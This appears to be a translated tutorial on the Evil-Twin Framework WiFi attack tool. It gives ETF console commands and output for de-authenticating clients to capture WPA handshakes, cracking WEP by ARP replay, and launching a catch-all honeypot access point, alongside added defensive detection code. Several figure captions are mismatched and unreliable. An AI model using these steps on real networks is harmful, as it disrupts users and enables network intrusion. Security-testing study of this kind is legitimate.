What is the framework and function of ETF?

2025-02-22 Update From: SLTechnology News&Howtos (shulou)


Shulou(Shulou.com)06/01 Report--

This article introduces the relevant knowledge of "what is the framework and function of ETF". The editor walks you through the operation process with an actual case; the method is simple, fast and practical. I hope this article can help you solve the problem.

Architecture of ETF

ETF is written in Python because code in this language is very easy to read, which makes it easy for other developers to contribute code to the project. In addition, many libraries useful to ETF, such as Scapy, are developed for Python and can easily be used with ETF.

The architecture of ETF (figure 1) is divided into different modules that interact with each other. The framework's settings are written in a separate configuration file. Users can check and modify these settings through the user interface, which goes through the ConfigurationManager class. Other modules can only read these settings and run according to them.

Figure 1: the Evil-Twin Framework architecture

ETF supports a variety of user interfaces that interact with the framework; the current default interface is an interactive console, similar to that of Metasploit. A graphical user interface (GUI) and a command line interface (CLI) for desktop and browser use are being developed, and a mobile interface is a possibility for the future. Users can use the interactive console to modify the settings in the configuration file (eventually also through the GUI). The user interface can interact with every module that exists in the framework.

The WiFi module (AirCommunicator) is used to support a variety of WiFi functions and attack types. The framework defines three basic pillars of Wi-Fi communication: packet sniffing, custom packet injection, and the creation of access points. The three main WiFi communication modules AirScanner, AirInjector, and AirHost are used for packet sniffing, packet injection, and access point creation, respectively. These three classes are encapsulated in the main WiFi module AirCommunicator, and AirCommunicator reads the configuration files of these services before starting them. Any type of WiFi attack can be constructed using one or more of these core functions.

To support man-in-the-middle (MITM) attacks, a common way of attacking WiFi clients, ETF has an integrated module called ETFITM (Evil-Twin Framework-in-the-Middle), which creates a web proxy that intercepts and modifies the HTTP/HTTPS packets passing through it.

Many other tools can also take advantage of the MITM position created by ETF. Through its extensibility, ETF can support them without the user having to call them separately: these tools can be added to the framework by extending the Spawner class. This allows developers and security auditors to invoke such programs from within the framework with preconfigured argument strings.

Another way to extend ETF is through plug-ins. There are two types of plug-ins: WiFi plug-ins and MITM plug-ins. A MITM plug-in is a script that runs while the MITM proxy is running. The proxy passes HTTP(S) requests and responses to the plug-ins, which can log and process them. WiFi plug-ins follow a more complex execution flow, but still offer a relatively simple API for contributors who want to develop and use their own plug-ins. WiFi plug-ins are further divided into three categories, each corresponding to one of the core WiFi communication modules.

Each core module has specific events that trigger the execution of the corresponding plug-in. For example, AirScanner has three defined events, and a plug-in can implement a handler for each. The events usually correspond to the setup phase before the service starts running, the intermediate execution phase while the service is running, and the teardown or cleanup phase after the service has finished. Because Python allows multiple inheritance, a plug-in can inherit from several plug-in classes.
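The three-phase plug-in model described above (setup, per-frame execution, cleanup, with one plug-in able to hook several modules through multiple inheritance) is easy to misread from prose alone, so here is an added illustration. It is example code written for this article, not ETF's own implementation: the class names AirScannerPlugin, AirInjectorPlugin and AirScanner and the hook names pre_scanning, handle_packet, post_scanning, pre_injection and post_injection are assumptions, and the frames fed to the scanner are constructed.

```python
# Added illustration of an event-driven plug-in model: a base class per core
# module with setup / per-frame / cleanup hooks, combined by multiple
# inheritance. Class and hook names are assumptions, not ETF's real API.
from dataclasses import dataclass


@dataclass
class Frame:
    """Constructed stand-in for a sniffed 802.11 frame (not ETF's own type)."""
    subtype: str
    src: str
    dst: str


class AirScannerPlugin:
    """Hook points for the sniffer module; method names are assumptions."""

    def pre_scanning(self, config: dict) -> None:   # setup phase, before sniffing
        pass

    def handle_packet(self, frame: Frame) -> None:  # mid-execution phase, per frame
        pass

    def post_scanning(self) -> dict:                # cleanup phase, returns a report
        return {}


class AirInjectorPlugin:
    """Hook points for the injector module; method names are assumptions."""

    def pre_injection(self, config: dict) -> None:
        pass

    def post_injection(self) -> dict:
        return {}


class FrameCounter(AirScannerPlugin):
    """Tallies frames by subtype: a plug-in only overrides the hooks it needs."""

    def __init__(self):
        self.counts = {}

    def handle_packet(self, frame):
        self.counts[frame.subtype] = self.counts.get(frame.subtype, 0) + 1

    def post_scanning(self):
        return {"frame_counts": dict(self.counts)}


class SessionAuditor(AirScannerPlugin, AirInjectorPlugin):
    """Inherits both plug-in classes, so one object can hook both modules."""

    def __init__(self):
        self.events = []

    def pre_scanning(self, config):
        self.events.append(f"scan:start:channel={config.get('fixed_sniffing_channel')}")

    def post_scanning(self):
        self.events.append("scan:stop")
        return {"events": list(self.events)}

    def pre_injection(self, config):
        self.events.append("inject:start")

    def post_injection(self):
        self.events.append("inject:stop")
        return {"events": list(self.events)}


class AirScanner:
    """Drives the setup, per-frame and cleanup phases over a frame source."""

    def __init__(self, config: dict, plugins):
        self.config = config
        # Only objects that implement the scanner hooks are attached here.
        self.plugins = [p for p in plugins if isinstance(p, AirScannerPlugin)]

    def run(self, frames):
        for p in self.plugins:
            p.pre_scanning(self.config)
        for frame in frames:
            for p in self.plugins:
                p.handle_packet(frame)
        return {type(p).__name__: p.post_scanning() for p in self.plugins}


def demo():
    """Run the scanner over constructed frames with both plug-ins attached."""
    frames = [
        Frame("beacon", "00:11:22:33:44:55", "ff:ff:ff:ff:ff:ff"),
        Frame("probe_req", "aa:bb:cc:dd:ee:01", "ff:ff:ff:ff:ff:ff"),
        Frame("beacon", "00:11:22:33:44:55", "ff:ff:ff:ff:ff:ff"),
        Frame("deauth", "00:11:22:33:44:55", "aa:bb:cc:dd:ee:01"),
    ]
    config = {"fixed_sniffing_channel": 11, "hop_channels": False}
    return AirScanner(config, [FrameCounter(), SessionAuditor()]).run(frames)


if __name__ == "__main__":
    print(demo())
```

The point of the isinstance filter in AirScanner is that a SessionAuditor instance is accepted by the scanner because it inherits AirScannerPlugin, while a pure AirInjectorPlugin is ignored; the injector module would apply the mirror-image filter for its own hooks.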

Figure 1 above summarizes the framework architecture. An arrow pointing away from the ConfigurationManager means that the module reads information from it, and an arrow pointing towards it means that the module writes or modifies the configuration.

Example of using ETF

ETF can test the security of a WiFi network, or the WiFi security awareness of end users, in a variety of ways. The following examples describe some of the framework's penetration-testing features, such as access point and client discovery, attacking access points that use the WPA and WEP protocols, and creating evil twin access points.

These examples were run with ETF and WiFi cards that support WiFi packet capture. They use the following abbreviations in the ETF setup commands:

APS: Access Point SSID
APB: Access Point BSSID
APC: Access Point Channel
CM: Client MAC address

In the actual test scenario, make sure you use the correct information to replace these abbreviations.

Capturing the WPA four-way handshake after a de-authentication attack

This scenario (figure 2) considers two aspects: the possibility of carrying out a de-authentication attack, and capturing the WPA four-way handshake packets. The scenario starts with a WPA/WPA2-enabled access point that has a connected client device (in this case, a smartphone). The goal is to disconnect the client from the WiFi network with a standard de-authentication attack (translator's note: similar to a DoS attack), and then capture the WPA handshake packets when the client tries to reconnect. The reconnection is done manually as soon as the connection is dropped.

Figure 2: scenario in which WPA handshake packets are captured after a de-authentication attack

What this example measures is the reliability of ETF. The goal is to confirm that the tool captures the WPA handshake packets every time. The scenario is repeated multiple times with each tool to check its reliability at capturing WPA handshake packets.

There is more than one way to capture WPA handshake packets with ETF. One way is to use a combination of the AirScanner and AirInjector modules; the other is to use only AirInjector. The following scenario uses the combination of the two modules.

ETF starts the AirScanner module and analyzes IEEE 802.11 data frames to discover the WPA handshake packets. AirInjector can then use a de-authentication attack to force clients to disconnect so that they reconnect. The following steps must be performed in ETF to achieve this:

1. Enter AirScanner configuration mode: config airscanner
2. Set AirScanner not to hop channels: set hop_channels = false
3. Set the channel to sniff to the access point's channel (APC): set fixed_sniffing_channel = <APC>
4. Start the AirScanner module with the CredentialSniffer plug-in: start airscanner with credentialsniffer
5. Add the target access point, selected by its SSID (APS), from the list of sniffed access points: add aps where ssid = <APS>
6. Start the AirInjector module, which by default launches the de-authentication attack: start airinjector

These simple commands let ETF perform a successful and effective de-authentication attack in every test run, and ETF captured the WPA handshake packets in every test as well. The following console output shows a successful execution of ETF.

[+] Do you want to load an older session? [Y/n]: n
[+] Creating new temporary session on 02/2018
[+] Enter the desired session name:
ETF [etf/aircommunicator/]:: > config airscanner
ETF [etf/aircommunicator/airscanner]:: > listargs
    sniffing_interface = wlan1; (var)
    probes = True; (var)
    beacons = True; (var)
    hop_channels = false; (var)
    fixed_sniffing_channel = 11; (var)
ETF [etf/aircommunicator/airscanner]:: > start airscanner with
    arpreplayer  caffelatte  credentialsniffer  packetlogger  selfishwifi
ETF [etf/aircommunicator/airscanner]:: > start airscanner with credentialsniffer
[+] Successfully added credentialsniffer plugin.
[+] Starting packet sniffer on interface 'wlan1'
[+] Set fixed channel to 11
ETF [etf/aircommunicator/airscanner]:: > add aps where ssid = CrackWPA
ETF [etf/aircommunicator/airscanner]:: > start airinjector
ETF [etf/aircommunicator/airscanner]:: > [+] Starting deauthentication attack
    - 1000 bursts of 1 packets
    - 1 different packets
[+] Injection attacks finished executing.
[+] Starting post injection methods
[+] Post injection methods finished
[+] WPA Handshake found for client '70:3e:ac:bb:78:64' and network 'CrackWPA'

Use an ARP replay attack and crack a WEP wireless network

The following scenario (figure 3) focuses on the efficiency of Address Resolution Protocol (ARP) replay attacks and the speed at which WEP packets containing initialization vectors (IVs) can be captured. The same network may need a different number of captured IVs to be cracked, so the upper limit of IVs for this scenario is 50000. If the network is cracked before 50000 IVs are captured in the first test, the actual number of IVs captured becomes the new upper limit for that network in the next test. We use aircrack-ng to crack the captured packets.

The test scenario starts with a WiFi access point encrypted with the WEP protocol and an offline client device that knows its key (12345 is used for testing convenience, but it could be a longer and more complex key). Once the client connects to the WEP access point, it sends a gratuitous ARP packet; this is the packet to be captured and replayed. Once the number of captured packets containing IVs reaches the set limit, the test is over.

Figure 3: scenario of capturing WPA handshake packet after de-authentication attack

ETF uses Python's Scapy library for packet sniffing and packet injection. To work around known performance problems in Scapy, ETF has fine-tuned some low-level libraries to greatly speed up packet injection. For this particular scenario, ETF uses tcpdump as a background process rather than Scapy to identify the encrypted ARP packets, in order to sniff more efficiently.

This scenario requires the following commands and actions to be performed on ETF:

1. Enter AirScanner configuration mode: config airscanner
2. Set AirScanner not to hop channels: set hop_channels = false
3. Set the channel to sniff to the access point's channel (APC): set fixed_sniffing_channel = <APC>
4. Enter ARPReplayer plug-in configuration mode: config arpreplayer
5. Set the BSSID (APB) of the target WEP access point: set target_ap_bssid = <APB>
6. Start the AirScanner module with the ARPReplayer plug-in: start airscanner with arpreplayer

After executing these commands, ETF correctly identifies the encrypted ARP packets and then successfully performs an ARP replay attack to crack the network.
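The two scenarios above leave distinctive traces on the air: the de-authentication burst that precedes the handshake capture (1000 bursts from one transmitter in the console output), and the same encrypted ARP frame retransmitted verbatim against the WEP network. The following is an added, defender-side example written for this article, not ETF code: it parses raw IEEE 802.11 frames from their standard 24-byte MAC header and runs two detection heuristics over a constructed capture. MAC addresses, timestamps, thresholds and frame contents are all constructed; the frame layout (frame control, duration, three addresses, sequence control; WEP IV in the first three body bytes) follows the 802.11 standard.

```python
# Added defensive example (not ETF code): parse raw IEEE 802.11 frames and
# flag the two traffic patterns the scenarios above generate, namely a
# de-authentication burst and an encrypted WEP data frame replayed verbatim.
# Frames are constructed inline; MACs, thresholds and timestamps are invented.
import hashlib
import struct
from collections import Counter, defaultdict, deque
from dataclasses import dataclass

TYPE_MGMT, TYPE_DATA = 0, 2        # 802.11 frame-control type values
SUBTYPE_DEAUTH = 12                # management subtype 0xC
FLAG_PROTECTED = 0x40              # "protected frame" bit in the flags byte
BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass
class Frame:
    ftype: int
    subtype: int
    addr1: str      # receiver
    addr2: str      # transmitter
    addr3: str      # BSSID for the frames used here
    protected: bool
    body: bytes


def mac_to_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def bytes_to_mac(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_frame(raw):
    """Decode the 24-byte MAC header; everything after it is the frame body."""
    if len(raw) < 24:
        raise ValueError("truncated 802.11 header")
    fc0, fc1 = raw[0], raw[1]
    return Frame(ftype=(fc0 >> 2) & 0x3, subtype=(fc0 >> 4) & 0xF,
                 addr1=bytes_to_mac(raw[4:10]), addr2=bytes_to_mac(raw[10:16]),
                 addr3=bytes_to_mac(raw[16:22]), protected=bool(fc1 & FLAG_PROTECTED),
                 body=raw[24:])


def build_frame(ftype, subtype, addr1, addr2, addr3, body, protected=False, seq=0):
    """Constructed-capture helper: assemble a frame in the layout parse_frame reads."""
    fc0 = (subtype << 4) | (ftype << 2)
    fc1 = FLAG_PROTECTED if protected else 0
    hdr = struct.pack("<BBH", fc0, fc1, 0)                       # frame control, duration
    hdr += mac_to_bytes(addr1) + mac_to_bytes(addr2) + mac_to_bytes(addr3)
    hdr += struct.pack("<H", seq << 4)                           # sequence control
    return hdr + body


def detect_deauth_flood(events, window=1.0, threshold=10):
    """events: (timestamp, raw_frame) pairs. Report transmitters that send at
    least `threshold` deauthentication frames within any `window` seconds."""
    recent, alerted = defaultdict(deque), {}
    for ts, raw in events:
        f = parse_frame(raw)
        if f.ftype != TYPE_MGMT or f.subtype != SUBTYPE_DEAUTH:
            continue
        q = recent[f.addr2]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            alerted[f.addr2] = max(alerted.get(f.addr2, 0), len(q))
    return sorted(alerted.items())


def detect_wep_replay(events, threshold=5):
    """Count exact repeats of (transmitter, IV, ciphertext) among protected data
    frames. The WEP IV is the first 3 body bytes; a sender never legitimately
    resends the same IV with identical ciphertext, so heavy repetition means replay."""
    seen = Counter()
    for _ts, raw in events:
        f = parse_frame(raw)
        if f.ftype != TYPE_DATA or not f.protected or len(f.body) < 8:
            continue
        seen[(f.addr2, f.body[:3].hex(), hashlib.sha256(f.body).hexdigest()[:16])] += 1
    return sorted((src, iv, n) for (src, iv, _d), n in seen.items() if n > threshold)


def constructed_capture():
    """Constructed sample: one legitimate deauth, a spoofed burst, a little
    normal WEP traffic and one encrypted frame replayed verbatim."""
    ap, ap2, client = "00:11:22:33:44:55", "00:11:22:33:44:66", "aa:bb:cc:dd:ee:01"
    ev = [(0.0, build_frame(TYPE_MGMT, SUBTYPE_DEAUTH, client, ap2, ap2, struct.pack("<H", 3)))]
    for i in range(40):  # 40 broadcast deauths from the target BSSID inside 0.2 s
        ev.append((1.0 + i * 0.005, build_frame(TYPE_MGMT, SUBTYPE_DEAUTH, BROADCAST, ap, ap,
                                                struct.pack("<H", 7), seq=i)))
    for i in range(3):   # normal WEP data: fresh IV and different ciphertext each time
        body = bytes([i, 0x10, 0x20, 0]) + bytes([i] * 36) + b"\x00" * 4
        ev.append((2.0 + i * 0.1, build_frame(TYPE_DATA, 0, ap, client, ap, body,
                                              protected=True, seq=100 + i)))
    replayed = build_frame(TYPE_DATA, 0, ap, client, ap,
                           bytes([9, 9, 9, 0]) + bytes([0x5A] * 36) + b"\x00" * 4,
                           protected=True, seq=103)
    ev.extend((3.0 + i * 0.01, replayed) for i in range(20))  # same IV, same ciphertext
    return ev


if __name__ == "__main__":
    cap = constructed_capture()
    print("deauth floods:", detect_deauth_flood(cap))
    print("wep replays:", detect_wep_replay(cap))
```

On the constructed capture the single deauth from the second access point stays below the threshold, the burst is reported with its peak count, and only the repeated WEP frame is flagged as a replay. Both heuristics rely on unprotected management frames and on WEP's per-frame IV being visible; 802.11w (protected management frames) removes the first problem and retiring WEP removes the second, which is the mitigation these scenarios argue for.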

Use a catch-all honeypot

The scenario in figure 4 creates multiple access points with the same SSID. For WiFi networks that can be detected but cannot be accessed, this technique can discover the network's security type. By starting multiple access points covering every security setting, the client automatically connects to the one that matches its locally cached access point information.

Figure 4: WPA handshake packet data is captured after the de-authentication attack.

With ETF, you can set up the hostapd configuration file and then start the program in the background. hostapd supports running multiple access points by setting up virtual interfaces on a single wireless card, and because it supports all types of security settings, it can set up a complete catch-all honeypot. For networks that use WEP and WPA(2)-PSK, a default password is used; for networks that use WPA(2)-EAP, an accept-all policy is configured.
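Seen from the client or from a wireless IDS, the catch-all honeypot described above has a clear signature: one SSID beaconed at the same time with several different security types, something a legitimate multi-AP network never does. The following added example (written for this article, not ETF or hostapd code) checks constructed beacon observations for that signature and applies a conservative auto-join rule against a client's saved profiles. The beacon list, the BSSIDs and the profile table are constructed; the security labels stand in for what a real scanner would derive from the RSN/WPA information elements and the privacy bit.

```python
# Added defensive example (not ETF code): spot a catch-all honeypot from its
# beacons and decide whether a saved network is safe to auto-join.
from collections import defaultdict

# Constructed beacon observations: (ssid, bssid, channel, security).
BEACONS = [
    ("CatchMe", "02:00:00:00:00:01", 6, "OPEN"),
    ("CatchMe", "02:00:00:00:00:02", 6, "WEP"),
    ("CatchMe", "02:00:00:00:00:03", 6, "WPA2-PSK"),
    ("CatchMe", "02:00:00:00:00:04", 6, "WPA2-EAP"),
    ("HomeNet", "c0:ff:ee:00:00:01", 1, "WPA2-PSK"),    # legitimate two-AP network
    ("HomeNet", "c0:ff:ee:00:00:02", 11, "WPA2-PSK"),
    ("CoffeeWifi", "de:ad:be:ef:00:01", 1, "OPEN"),
]

# Constructed saved profiles, as a client would cache them (ssid -> security).
PROFILES = {"CatchMe": "WPA2-PSK", "HomeNet": "WPA2-PSK", "CoffeeWifi": "OPEN"}


def find_catch_all(beacons):
    """SSIDs advertised with more than one security type at once: the
    signature of a catch-all honeypot. Legitimate multi-AP networks reuse
    the SSID but keep a single security configuration."""
    by_ssid = defaultdict(set)
    for ssid, _bssid, _ch, sec in beacons:
        by_ssid[ssid].add(sec)
    return {s: sorted(secs) for s, secs in by_ssid.items() if len(secs) > 1}


def profile_mismatches(beacons, profiles):
    """Beacons for a saved SSID whose security differs from the saved profile."""
    return [(ssid, bssid, sec, profiles[ssid])
            for ssid, bssid, _ch, sec in beacons
            if ssid in profiles and profiles[ssid] != sec]


def safe_to_autojoin(ssid, beacons, profiles):
    """Client-side rule: auto-join only a saved, non-open network whose every
    visible beacon matches the saved security type and which is not a
    catch-all SSID. Open networks are excluded because nothing authenticates
    an open access point to the client, so any twin of it is indistinguishable."""
    if ssid not in profiles or profiles[ssid] == "OPEN":
        return False
    if ssid in find_catch_all(beacons):
        return False
    return all(sec == profiles[ssid] for s, _b, _c, sec in beacons if s == ssid)


if __name__ == "__main__":
    print("catch-all SSIDs:", find_catch_all(BEACONS))
    print("profile mismatches:", profile_mismatches(BEACONS, PROFILES))
    for name in PROFILES:
        print(name, "auto-join:", safe_to_autojoin(name, BEACONS, PROFILES))
```

With the constructed data, CatchMe is reported as a catch-all SSID and refused for auto-join even though one of its BSSIDs matches the saved WPA2-PSK profile, HomeNet passes because both of its access points agree on the security type, and CoffeeWifi is refused simply for being open. The practical mitigation for end users follows from the same logic: forget stale profiles, and do not let the device auto-join open networks.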

For this scenario, the following commands and actions must be performed on ETF:

1. Enter APLauncher configuration mode: config aplauncher
2. Set the SSID (APS) of the access point to launch: set ssid = <APS>
3. Set APLauncher to catch-all honeypot mode: set catch_all_honeypot = true
4. Start the AirHost module: start airhost

Using these commands, ETF can start a complete catch-all honeypot with every type of security configuration. ETF also automatically starts DHCP and DNS servers, allowing clients to stay connected to the Internet. ETF provides a better, faster and more complete solution for creating a catch-all honeypot. The following console output shows a successful execution of ETF.

[+] Do you want to load an older session? [Y/n]: n
[+] Creating new temporary session on 03/08/2018
[+] Enter the desired session name:
ETF [etf/aircommunicator/]:: > config aplauncher
ETF [etf/aircommunicator/airhost/aplauncher]:: > setconf ssid CatchMe
ssid = CatchMe
ETF [etf/aircommunicator/airhost/aplauncher]:: > setconf catch_all_honeypot true
catch_all_honeypot = true
ETF [etf/aircommunicator/airhost/aplauncher]:: > start airhost
[+] Killing already started processes and restarting network services
[+] Stopping dnsmasq and hostapd services
[+] Access Point stopped...
[+] Running airhost plugins pre_start
[+] Starting hostapd background process
[+] Starting dnsmasq service
[+] Running airhost plugins post_start
[+] Access Point launched successfully
[+] Starting dnsmasq service

That is all for "what is the framework and function of ETF". Thank you for reading. If you want to know more about the industry, you can follow the industry information channel. The editor will update different knowledge points for you every day.


© 2024 shulou.com SLNews company. All rights reserved.
